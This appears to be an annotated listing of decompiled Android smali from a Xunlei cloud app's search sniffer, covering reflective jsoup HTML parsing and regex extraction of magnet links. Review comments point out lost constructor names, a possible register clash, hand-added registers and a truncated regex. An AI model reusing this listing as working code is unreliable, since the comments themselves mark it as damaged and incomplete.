    invoke-virtual {p0, v0}, Ljava/lang/String;->substring(I)Ljava/lang/String;

    move-result-object v0

    goto :goto_1

    .line 357
    # return p0.substring(start + p2.length(), index of end marker)
    :cond_4
    invoke-virtual {p2}, Ljava/lang/String;->length()I

    move-result v2

    add-int/2addr v0, v2

    invoke-virtual {p0, v0, v1}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v0

    goto :goto_1

    :cond_5
    move v0, v1

    goto :goto_0
.end method
263 |
# Extracts one string from the jsoup Element p0 by following the rule object p1
# (SnifferField0). The log strings below tag this routine as "[extractString]".
#   1. Invoke, by reflection, the Element method named by p1.extract_opera (with
#      p1.extract_para as its single String argument when that is non-blank) and
#      require exactly one Element in the resulting Elements.
#   2. Invoke the Element method named by p1.element_data_opera on that element
#      (again with an optional String argument) to obtain the raw string.
#   3. Apply the trim / append / middle / case steps in ascending order of their
#      order_* values; a step whose order is -1 is skipped.
# Returns null when the selection does not yield exactly one element, when the raw
# string is null or empty, or when a trim/append/middle step returns null.
# NOTE(review): both method names come from fields of p1 and are resolved with
# Class.getMethod, so whoever supplies p1 chooses which public Element method runs.
# Where p1 is populated is not visible here; if it is remote configuration, an
# allow-list of accepted method names would bound what it can select.
# NOTE(review): the invoke-direct lines below read "->(" with no method name; a
# constructor call is normally written "-><init>(", so the name was probably lost
# when this listing was extracted.
264 | .method private static a(Lorg/jsoup/nodes/Element;Lcom/xunlei/cloud/action/search/SnifferField0;)Ljava/lang/String;
265 | .locals 9
266 | .parameter
267 | .parameter
268 | .annotation build Landroid/annotation/SuppressLint;
269 | value = {
270 | "UseSparseArrays"
271 | }
272 | .end annotation
273 |
274 | .annotation system Ldalvik/annotation/Throws;
275 | value = {
276 | Ljava/lang/NoSuchMethodException;,
277 | Ljava/lang/IllegalArgumentException;,
278 | Ljava/lang/IllegalAccessException;,
279 | Ljava/lang/reflect/InvocationTargetException;
280 | }
281 | .end annotation
282 |
283 | .prologue
# v7 = null (used as the failure return value), v8 = 1, v6 = 0.
284 | const/4 v7, 0x0
285 |
286 | const/4 v8, 0x1
287 |
288 | const/4 v6, 0x0
289 |
290 | .line 219
# v1 = Element.class, the class every reflective lookup below is made on.
291 | const-class v1, Lorg/jsoup/nodes/Element;
292 |
293 | .line 223
# v0 = name of the selection method, v2 = its optional argument.
294 | iget-object v0, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_opera:Ljava/lang/String;
295 |
296 | .line 224
297 | iget-object v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_para:Ljava/lang/String;
298 |
299 | .line 225
# A non-blank argument selects the one-String-parameter overload at :cond_1.
300 | invoke-virtual {v2}, Ljava/lang/String;->trim()Ljava/lang/String;
301 |
302 | move-result-object v3
303 |
304 | invoke-virtual {v3}, Ljava/lang/String;->length()I
305 |
306 | move-result v3
307 |
308 | if-nez v3, :cond_1
309 |
310 | .line 226
# Blank argument: look up and invoke the zero-parameter method on p0.
311 | new-array v3, v6, [Ljava/lang/Class;
312 |
313 | invoke-virtual {v1, v0, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
314 |
315 | move-result-object v0
316 |
317 | .line 227
318 | new-array v3, v6, [Ljava/lang/Object;
319 |
320 | invoke-virtual {v0, p0, v3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
321 |
322 | move-result-object v0
323 |
# The result is cast unconditionally; a method that returns anything other than
# Elements fails here with a ClassCastException, which is not in the Throws list.
324 | check-cast v0, Lorg/jsoup/select/Elements;
325 |
326 | .line 233
327 | :goto_0
# Exactly one selected element is required (v8 == 1).
328 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->size()I
329 |
330 | move-result v3
331 |
332 | if-eq v3, v8, :cond_2
333 |
334 | .line 234
# Otherwise report the argument through g.e (presumably a log helper) and return null.
335 | new-instance v0, Ljava/lang/StringBuilder;
336 |
337 | const-string v1, "[extractString] elementList.size() != 1, getElementPara = "
338 |
339 | invoke-direct {v0, v1}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V
340 |
341 | invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
342 |
343 | move-result-object v0
344 |
345 | invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
346 |
347 | move-result-object v0
348 |
349 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
350 |
351 | move-object v0, v7
352 |
353 | .line 308
# Single exit point: returns whatever v0 holds (the result string or null).
354 | :cond_0
355 | :goto_1
356 | return-object v0
357 |
358 | .line 229
# Non-blank argument: look up the (String) overload and pass extract_para to it.
359 | :cond_1
360 | new-array v3, v8, [Ljava/lang/Class;
361 |
362 | const-class v4, Ljava/lang/String;
363 |
364 | aput-object v4, v3, v6
365 |
366 | invoke-virtual {v1, v0, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
367 |
368 | move-result-object v0
369 |
370 | .line 230
371 | new-array v3, v8, [Ljava/lang/Object;
372 |
373 | aput-object v2, v3, v6
374 |
375 | invoke-virtual {v0, p0, v3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
376 |
377 | move-result-object v0
378 |
379 | check-cast v0, Lorg/jsoup/select/Elements;
380 |
381 | goto :goto_0
382 |
383 | .line 239
# Step 2: take the single element and read its data through a second reflective call.
384 | :cond_2
385 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->first()Lorg/jsoup/nodes/Element;
386 |
387 | move-result-object v0
388 |
389 | .line 243
390 | iget-object v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_opera:Ljava/lang/String;
391 |
392 | .line 244
393 | iget-object v3, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_para:Ljava/lang/String;
394 |
395 | .line 245
396 | invoke-virtual {v3}, Ljava/lang/String;->trim()Ljava/lang/String;
397 |
398 | move-result-object v4
399 |
400 | invoke-virtual {v4}, Ljava/lang/String;->length()I
401 |
402 | move-result v4
403 |
404 | if-nez v4, :cond_4
405 |
406 | .line 246
# Blank argument: zero-parameter accessor, result cast to String.
407 | new-array v3, v6, [Ljava/lang/Class;
408 |
409 | invoke-virtual {v1, v2, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
410 |
411 | move-result-object v1
412 |
413 | .line 247
414 | new-array v2, v6, [Ljava/lang/Object;
415 |
416 | invoke-virtual {v1, v0, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
417 |
418 | move-result-object v0
419 |
420 | check-cast v0, Ljava/lang/String;
421 |
422 | .line 252
# A null or empty raw string ends the extraction with a null result.
423 | :goto_2
424 | if-eqz v0, :cond_3
425 |
426 | invoke-virtual {v0}, Ljava/lang/String;->length()I
427 |
428 | move-result v1
429 |
430 | if-nez v1, :cond_5
431 |
432 | :cond_3
433 | move-object v0, v7
434 |
435 | .line 253
436 | goto :goto_1
437 |
438 | .line 249
# Non-blank argument: (String) overload with element_data_para as the argument.
439 | :cond_4
440 | new-array v4, v8, [Ljava/lang/Class;
441 |
442 | const-class v5, Ljava/lang/String;
443 |
444 | aput-object v5, v4, v6
445 |
446 | invoke-virtual {v1, v2, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
447 |
448 | move-result-object v1
449 |
450 | .line 250
451 | new-array v2, v8, [Ljava/lang/Object;
452 |
453 | aput-object v3, v2, v6
454 |
455 | invoke-virtual {v1, v0, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
456 |
457 | move-result-object v0
458 |
459 | check-cast v0, Ljava/lang/String;
460 |
461 | goto :goto_2
462 |
463 | .line 258
# Step 3: build a map from order value to step name.
# The order value is the map key, so two steps configured with the same order
# overwrite each other and only the one put last is applied.
464 | :cond_5
465 | new-instance v1, Ljava/util/HashMap;
466 |
467 | invoke-direct {v1}, Ljava/util/HashMap;->()V
468 |
469 | .line 259
470 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->order_trim:I
471 |
472 | invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
473 |
474 | move-result-object v2
475 |
476 | const-string v3, "order_trim"
477 |
478 | invoke-interface {v1, v2, v3}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
479 |
480 | .line 260
481 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->order_append:I
482 |
483 | invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
484 |
485 | move-result-object v2
486 |
487 | const-string v3, "order_append"
488 |
489 | invoke-interface {v1, v2, v3}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
490 |
491 | .line 261
492 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->order_middle:I
493 |
494 | invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
495 |
496 | move-result-object v2
497 |
498 | const-string v3, "order_middle"
499 |
500 | invoke-interface {v1, v2, v3}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
501 |
502 | .line 262
503 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->order_case:I
504 |
505 | invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
506 |
507 | move-result-object v2
508 |
509 | const-string v3, "order_case"
510 |
511 | invoke-interface {v1, v2, v3}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
512 |
513 | .line 263
# Copying into a TreeMap makes the iteration below run in ascending key order.
514 | new-instance v2, Ljava/util/TreeMap;
515 |
516 | invoke-direct {v2, v1}, Ljava/util/TreeMap;->(Ljava/util/Map;)V
517 |
518 | .line 264
519 | invoke-interface {v2}, Ljava/util/Map;->entrySet()Ljava/util/Set;
520 |
521 | move-result-object v1
522 |
523 | invoke-interface {v1}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
524 |
# v8 stops being the constant 1 here and holds the entry iterator from now on.
525 | move-result-object v8
526 |
527 | :cond_6
528 | :goto_3
# Loop head: when the entries are exhausted, return the current string via :cond_0.
529 | invoke-interface {v8}, Ljava/util/Iterator;->hasNext()Z
530 |
531 | move-result v1
532 |
533 | if-eqz v1, :cond_0
534 |
535 | invoke-interface {v8}, Ljava/util/Iterator;->next()Ljava/lang/Object;
536 |
537 | move-result-object v1
538 |
539 | check-cast v1, Ljava/util/Map$Entry;
540 |
541 | .line 268
# An order value of -1 means the step is skipped.
542 | invoke-interface {v1}, Ljava/util/Map$Entry;->getKey()Ljava/lang/Object;
543 |
544 | move-result-object v2
545 |
546 | check-cast v2, Ljava/lang/Integer;
547 |
548 | invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
549 |
550 | move-result v2
551 |
552 | const/4 v3, -0x1
553 |
554 | if-eq v2, v3, :cond_6
555 |
556 | .line 272
# v1 = step name; the chain below dispatches on it.
557 | invoke-interface {v1}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
558 |
559 | move-result-object v1
560 |
561 | check-cast v1, Ljava/lang/String;
562 |
563 | .line 273
564 | const-string v2, "order_trim"
565 |
566 | invoke-virtual {v1, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
567 |
568 | move-result v2
569 |
570 | if-eqz v2, :cond_7
571 |
572 | .line 275
# Trim step: g.a(String, int, int) with the configured head and tail counts.
573 | iget v1, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_trim_num_head:I
574 |
575 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_trim_num_tail:I
576 |
577 | invoke-static {v0, v1, v2}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;II)Ljava/lang/String;
578 |
579 | move-result-object v0
580 |
581 | .line 277
582 | if-nez v0, :cond_6
583 |
584 | .line 278
585 | const-string v0, "[extractString] after trim data = null"
586 |
587 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
588 |
589 | move-object v0, v7
590 |
591 | .line 279
592 | goto/16 :goto_1
593 |
594 | .line 281
595 | :cond_7
596 | const-string v2, "order_append"
597 |
598 | invoke-virtual {v1, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
599 |
600 | move-result v2
601 |
602 | if-eqz v2, :cond_8
603 |
604 | .line 283
# Append step: g.a(String, String, String) with the configured head and tail strings.
605 | iget-object v1, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_append_head:Ljava/lang/String;
606 |
607 | iget-object v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_append_tail:Ljava/lang/String;
608 |
609 | invoke-static {v0, v1, v2}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
610 |
611 | move-result-object v0
612 |
613 | .line 285
614 | if-nez v0, :cond_6
615 |
616 | .line 286
617 | const-string v0, "[extractString] after add data == null"
618 |
619 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
620 |
621 | move-object v0, v7
622 |
623 | .line 287
624 | goto/16 :goto_1
625 |
626 | .line 289
627 | :cond_8
628 | const-string v2, "order_middle"
629 |
630 | invoke-virtual {v1, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
631 |
632 | move-result v2
633 |
634 | if-eqz v2, :cond_b
635 |
636 | .line 292
# Middle step: runs only when at least one of the head/tail markers is non-empty.
637 | iget-object v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_head:Ljava/lang/String;
638 |
639 | .line 293
640 | iget-object v5, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_tail:Ljava/lang/String;
641 |
642 | .line 294
643 | invoke-virtual {v2}, Ljava/lang/String;->length()I
644 |
645 | move-result v1
646 |
647 | if-nez v1, :cond_9
648 |
649 | invoke-virtual {v5}, Ljava/lang/String;->length()I
650 |
651 | move-result v1
652 |
653 | if-eqz v1, :cond_a
654 |
655 | .line 295
# Register layout for the range call: v0 = data, v1 = from_begin, v2 = head,
# v3 = head_must, v4 = until_end, v5 = tail, v6 = tail_must.
656 | :cond_9
657 | iget-boolean v1, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_from_begin:Z
658 |
659 | iget-boolean v3, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_head_must:Z
660 |
661 | .line 296
662 | iget-boolean v4, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_until_end:Z
663 |
664 | iget-boolean v6, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_tail_must:Z
665 |
666 | .line 295
667 | invoke-static/range {v0 .. v6}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;ZLjava/lang/String;ZZLjava/lang/String;Z)Ljava/lang/String;
668 |
669 | move-result-object v0
670 |
671 | .line 298
672 | :cond_a
673 | if-nez v0, :cond_6
674 |
675 | .line 299
676 | const-string v0, "[extractString] after middle data == null"
677 |
678 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
679 |
680 | move-object v0, v7
681 |
682 | .line 300
683 | goto/16 :goto_1
684 |
685 | .line 302
686 | :cond_b
687 | const-string v2, "order_case"
688 |
689 | invoke-virtual {v1, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
690 |
691 | move-result v1
692 |
693 | if-eqz v1, :cond_6
694 |
695 | .line 304
# Case step: g.a(String, int) with p1.the_case. Unlike the other steps, its result
# is not null-checked before the loop continues.
696 | iget v1, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->the_case:I
697 |
698 | invoke-static {v0, v1}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;I)Ljava/lang/String;
699 |
700 | move-result-object v0
701 |
702 | goto/16 :goto_3
703 | .end method
704 |
# Rule-driven HTML parser (the log strings tag it as "[parser0]"): parses the HTML
# text p1 with jsoup and returns a list of SnifferData built according to the
# Sniffer rule p0.
#   - Rows are selected by invoking, through reflection, the Document method named by
#     p0.select_row_opera_0 with p0.select_row_para_0 as its single String argument.
#   - For each row, every SnifferField0 in p0.field_list_0 is evaluated with
#     a(Element, SnifferField0); a non-null result is written into the SnifferData
#     field named by class_field_name (getDeclaredField + Field.set).
#   - A row is added to the result only when both url and hash are non-null and
#     non-empty.
# Returns an empty list when no rows are selected.
# NOTE(review): the invoked method name and the target field name are both data from
# the rule object. Where the rule is loaded from is not visible here; if it is remote
# configuration, it decides which public Document method runs and which SnifferData
# field is written. An allow-list for both names would bound that.
# NOTE(review): the invoke-direct lines below read "->(" with no method name; a
# constructor call is normally written "-><init>(", so the name was probably lost
# when this listing was extracted.
705 | .method public static a(Lcom/xunlei/cloud/action/search/Sniffer;Ljava/lang/String;)Ljava/util/ArrayList;
706 | .locals 9
707 | .parameter
708 | .parameter
709 | .annotation system Ldalvik/annotation/Signature;
710 | value = {
711 | "(",
712 | "Lcom/xunlei/cloud/action/search/Sniffer;",
713 | "Ljava/lang/String;",
714 | ")",
715 | "Ljava/util/ArrayList",
716 | "<",
717 | "Lcom/xunlei/cloud/action/search/SnifferData;",
718 | ">;"
719 | }
720 | .end annotation
721 |
722 | .annotation system Ldalvik/annotation/Throws;
723 | value = {
724 | Ljava/io/IOException;,
725 | Ljava/lang/NoSuchMethodException;,
726 | Ljava/lang/IllegalArgumentException;,
727 | Ljava/lang/IllegalAccessException;,
728 | Ljava/lang/reflect/InvocationTargetException;,
729 | Ljava/lang/NoSuchFieldException;,
730 | Ljava/lang/SecurityException;
731 | }
732 | .end annotation
733 |
734 | .prologue
# v7 = 1 and v6 = 0 are array-size/index constants until they are reused further down.
735 | const/4 v7, 0x1
736 |
737 | const/4 v6, 0x0
738 |
739 | .line 162
# v3 = result list.
740 | new-instance v3, Ljava/util/ArrayList;
741 |
742 | invoke-direct {v3}, Ljava/util/ArrayList;->()V
743 |
744 | .line 165
# v0 = parsed document for the HTML text in p1.
745 | invoke-static {p1}, Lorg/jsoup/Jsoup;->parse(Ljava/lang/String;)Lorg/jsoup/nodes/Document;
746 |
747 | move-result-object v0
748 |
749 | .line 167
750 | const-class v1, Lorg/jsoup/nodes/Document;
751 |
752 | .line 168
# Look up Document.<select_row_opera_0>(String) by name.
753 | iget-object v2, p0, Lcom/xunlei/cloud/action/search/Sniffer;->select_row_opera_0:Ljava/lang/String;
754 |
755 | new-array v4, v7, [Ljava/lang/Class;
756 |
757 | const-class v5, Ljava/lang/String;
758 |
759 | aput-object v5, v4, v6
760 |
761 | invoke-virtual {v1, v2, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
762 |
763 | move-result-object v1
764 |
765 | .line 169
# Invoke it on the document with select_row_para_0; the result is cast to Elements.
766 | new-array v2, v7, [Ljava/lang/Object;
767 |
768 | iget-object v4, p0, Lcom/xunlei/cloud/action/search/Sniffer;->select_row_para_0:Ljava/lang/String;
769 |
770 | aput-object v4, v2, v6
771 |
772 | invoke-virtual {v1, v0, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
773 |
774 | move-result-object v0
775 |
776 | check-cast v0, Lorg/jsoup/select/Elements;
777 |
778 | .line 171
# No rows: log through g.e (presumably a log helper) and return the empty list.
779 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->size()I
780 |
781 | move-result v1
782 |
783 | if-nez v1, :cond_0
784 |
785 | .line 172
786 | const-string v0, "[parser0] rowList.size() == 0"
787 |
788 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
789 |
790 | move-object v0, v3
791 |
792 | .line 207
793 | :goto_0
794 | return-object v0
795 |
796 | .line 176
# Log the row count. The escaped text reads "how many rows need parsing = ".
797 | :cond_0
798 | new-instance v1, Ljava/lang/StringBuilder;
799 |
800 | const-string v2, "[parser0] \u627e\u591a\u5c11\u884c\u9700\u8981\u89e3\u6790 = "
801 |
802 | invoke-direct {v1, v2}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V
803 |
804 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->size()I
805 |
806 | move-result v2
807 |
808 | invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
809 |
810 | move-result-object v1
811 |
812 | invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
813 |
814 | move-result-object v1
815 |
816 | invoke-static {v1}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
817 |
818 | .line 178
# v4 = row iterator.
819 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->iterator()Ljava/util/Iterator;
820 |
821 | move-result-object v4
822 |
823 | :cond_1
824 | :goto_1
# Outer loop head: one iteration per selected row.
825 | invoke-interface {v4}, Ljava/util/Iterator;->hasNext()Z
826 |
827 | move-result v0
828 |
829 | if-nez v0, :cond_2
830 |
831 | .line 205
# All rows done: log the result size and return. The escaped text reads
# "number of items sniffed: ".
832 | new-instance v0, Ljava/lang/StringBuilder;
833 |
834 | const-string v1, "[parser0] \u55c5\u63a2\u51fa\u7684\u4e2a\u6570\u662f\uff1a "
835 |
836 | invoke-direct {v0, v1}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V
837 |
838 | invoke-virtual {v3}, Ljava/util/ArrayList;->size()I
839 |
840 | move-result v1
841 |
842 | invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
843 |
844 | move-result-object v0
845 |
846 | invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
847 |
848 | move-result-object v0
849 |
850 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
851 |
852 | move-object v0, v3
853 |
854 | .line 207
855 | goto :goto_0
856 |
857 | .line 178
# v0 = current row element, v5 = fresh SnifferData for it, v6 = SnifferData.class.
858 | :cond_2
859 | invoke-interface {v4}, Ljava/util/Iterator;->next()Ljava/lang/Object;
860 |
861 | move-result-object v0
862 |
863 | check-cast v0, Lorg/jsoup/nodes/Element;
864 |
865 | .line 179
866 | new-instance v5, Lcom/xunlei/cloud/action/search/SnifferData;
867 |
868 | invoke-direct {v5}, Lcom/xunlei/cloud/action/search/SnifferData;->()V
869 |
870 | .line 180
871 | const-class v6, Lcom/xunlei/cloud/action/search/SnifferData;
872 |
873 | .line 182
# v7 = iterator over the field rules (v7 no longer holds the constant 1).
874 | iget-object v1, p0, Lcom/xunlei/cloud/action/search/Sniffer;->field_list_0:Ljava/util/ArrayList;
875 |
876 | invoke-virtual {v1}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
877 |
878 | move-result-object v7
879 |
880 | :cond_3
881 | :goto_2
# Inner loop head: one iteration per field rule.
882 | invoke-interface {v7}, Ljava/util/Iterator;->hasNext()Z
883 |
884 | move-result v1
885 |
886 | if-nez v1, :cond_4
887 |
888 | .line 199
# Field rules done: keep the row only if url and hash are both non-null and non-empty.
889 | iget-object v0, v5, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
890 |
891 | if-eqz v0, :cond_1
892 |
893 | iget-object v0, v5, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
894 |
895 | invoke-virtual {v0}, Ljava/lang/String;->length()I
896 |
897 | move-result v0
898 |
899 | if-eqz v0, :cond_1
900 |
901 | iget-object v0, v5, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
902 |
903 | if-eqz v0, :cond_1
904 |
905 | iget-object v0, v5, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
906 |
907 | invoke-virtual {v0}, Ljava/lang/String;->length()I
908 |
909 | move-result v0
910 |
911 | if-eqz v0, :cond_1
912 |
913 | .line 200
914 | invoke-virtual {v3, v5}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
915 |
916 | goto :goto_1
917 |
918 | .line 182
919 | :cond_4
920 | invoke-interface {v7}, Ljava/util/Iterator;->next()Ljava/lang/Object;
921 |
922 | move-result-object v1
923 |
924 | check-cast v1, Lcom/xunlei/cloud/action/search/SnifferField0;
925 |
926 | .line 184
# v2 = extracted value for this field; a null result skips the field.
927 | invoke-static {v0, v1}, Lcom/xunlei/cloud/action/search/g;->a(Lorg/jsoup/nodes/Element;Lcom/xunlei/cloud/action/search/SnifferField0;)Ljava/lang/String;
928 |
929 | move-result-object v2
930 |
931 | .line 185
932 | if-eqz v2, :cond_3
933 |
934 | .line 190
# Values destined for the "title" field are passed through g.d(String) first.
935 | iget-object v8, v1, Lcom/xunlei/cloud/action/search/SnifferField0;->class_field_name:Ljava/lang/String;
936 |
# NOTE(review): with ".locals 9" and two parameters, v9 is the same register as p0.
# Writing "title" into v9 would replace the Sniffer reference that the outer loop
# reads again through p0 (field_list_0). Confirm the register count against the
# original file; a count of 10 would keep v9 separate from p0.
937 | const-string v9, "title"
938 |
939 | invoke-virtual {v8, v9}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
940 |
941 | move-result v8
942 |
943 | if-eqz v8, :cond_5
944 |
945 | .line 191
946 | invoke-static {v2}, Lcom/xunlei/cloud/action/search/g;->d(Ljava/lang/String;)Ljava/lang/String;
947 |
948 | move-result-object v2
949 |
950 | .line 194
# Resolve the SnifferData field by its configured name and store the value.
# An unknown name raises NoSuchFieldException (listed in Throws above).
951 | :cond_5
952 | iget-object v1, v1, Lcom/xunlei/cloud/action/search/SnifferField0;->class_field_name:Ljava/lang/String;
953 |
954 | invoke-virtual {v6, v1}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
955 |
956 | move-result-object v1
957 |
958 | .line 195
959 | invoke-virtual {v1, v5, v2}, Ljava/lang/reflect/Field;->set(Ljava/lang/Object;Ljava/lang/Object;)V
960 |
961 | goto :goto_2
962 | .end method
963 |
# Regex-based parser: scans the text p0 with a compiled pattern and returns a list of
# SnifferData, one per distinct match. Each match is cut at fixed offsets: characters
# 0..60 become the url and characters 20..60, passed through g.a(String, int) with 1,
# become both the hash and the title. A match whose hash already exists in the list
# (case-insensitive) is skipped.
# NOTE(review): offset 20 equals the length of the "magnet:?xt=urn:btih:" prefix used
# in c(String), so the match is presumably a magnet URI followed by a 40-character
# hash. TODO confirm against the original pattern.
# NOTE(review): registers v10..v14 and the instructions using them carry no ".line"
# markers, unlike the rest of the method, which suggests they were added by hand to
# the decompiled output.
# NOTE(review): the invoke-direct lines below read "->(" with no method name; a
# constructor call is normally written "-><init>(", so the name was probably lost
# when this listing was extracted.
964 | .method public static a(Ljava/lang/String;)Ljava/util/ArrayList;
965 | .locals 15
966 | .parameter
967 | .annotation system Ldalvik/annotation/Signature;
968 | value = {
969 | "(",
970 | "Ljava/lang/String;",
971 | ")",
972 | "Ljava/util/ArrayList",
973 | "<",
974 | "Lcom/xunlei/cloud/action/search/SnifferData;",
975 | ">;"
976 | }
977 | .end annotation
978 |
979 | .prologue
# v2 = 1 (true), v3 = 0 (false).
980 | const/4 v2, 0x1
981 |
982 | const/4 v3, 0x0
983 |
984 | .line 77
# v4 = result list.
985 | new-instance v4, Ljava/util/ArrayList;
986 |
987 | invoke-direct {v4}, Ljava/util/ArrayList;->()V
988 |
989 | .line 79
# NOTE(review): as listed the pattern is ".*?", which can match the empty string,
# while the fixed offsets below (20, 60, 61) need a match of at least 60 characters.
# The literal may have lost markup-like text when this listing was extracted;
# confirm against the original file.
990 | const-string v0, ".*?"
991 |
# v10 = 0, v11 = 60, v12 = 61: substring offsets used further down.
992 | const/4 v10, 0x0
993 | const/16 v11, 0x3c
994 | const/16 v12, 0x3d
995 |
# Flag value 2 is Pattern.CASE_INSENSITIVE.
996 | const/4 v1, 0x2
997 |
998 | invoke-static {v0, v1}, Ljava/util/regex/Pattern;->compile(Ljava/lang/String;I)Ljava/util/regex/Pattern;
999 |
1000 | move-result-object v0
1001 |
1002 |
1003 |
1004 | .line 80
1005 | invoke-virtual {v0, p0}, Ljava/util/regex/Pattern;->matcher(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;
1006 |
1007 | move-result-object v5
1008 |
1009 | .line 81
1010 | :cond_0
1011 | :goto_0
# Loop head: return the list once no further match is found.
1012 | invoke-virtual {v5}, Ljava/util/regex/Matcher;->find()Z
1013 |
1014 | move-result v0
1015 |
1016 | if-nez v0, :cond_1
1017 |
1018 | .line 112
1019 | return-object v4
1020 |
1021 | .line 86
# v0 = matched text.
1022 | :cond_1
1023 | invoke-virtual {v5}, Ljava/util/regex/Matcher;->group()Ljava/lang/String;
1024 |
1025 | move-result-object v0
1026 |
1027 | .line 88
# Inspect the last character of the match; an empty match would make the index -1
# and charAt would throw StringIndexOutOfBoundsException.
1028 | invoke-virtual {v0}, Ljava/lang/String;->length()I
1029 |
1030 | move-result v1
1031 |
1032 | add-int/lit8 v1, v1, -0x1
1033 |
1034 | invoke-virtual {v0, v1}, Ljava/lang/String;->charAt(I)C
1035 |
1036 | move-result v1
1037 |
1038 | .line 89
